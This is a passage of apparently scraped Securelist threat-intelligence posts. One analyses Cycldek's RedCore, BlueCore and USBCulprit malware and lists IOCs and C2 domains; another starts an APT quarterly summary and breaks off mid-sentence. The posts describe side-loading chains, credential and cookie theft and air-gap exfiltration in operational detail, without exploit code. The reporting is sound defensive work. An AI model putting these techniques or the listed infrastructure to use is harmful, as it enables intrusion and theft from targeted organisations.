October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&amp;enpl=%s&amp;encd=%s | http://%s:%d/search.jsp?referer=%s&amp;kw=%s&amp;psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&amp;referer=%s&amp;kw=%s&amp;psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&amp;C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&amp;C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&amp;C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&amp;C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&amp;C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&amp;C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&amp;Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&amp;Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&amp;C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&amp;Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous &quot;DLL side-loading triad&quot;: a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar &quot;triads&quot;, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called &quot;FoundCore&quot;, which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the &#x27;[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)&#x27; report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the &#x27;[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)&#x27; post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed &quot;Moriya&quot;, was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named &quot;[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)&quot;. The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker&#x27;s infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker&#x27;s origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a &quot;remote shell&quot;-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren&#x27;t able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity 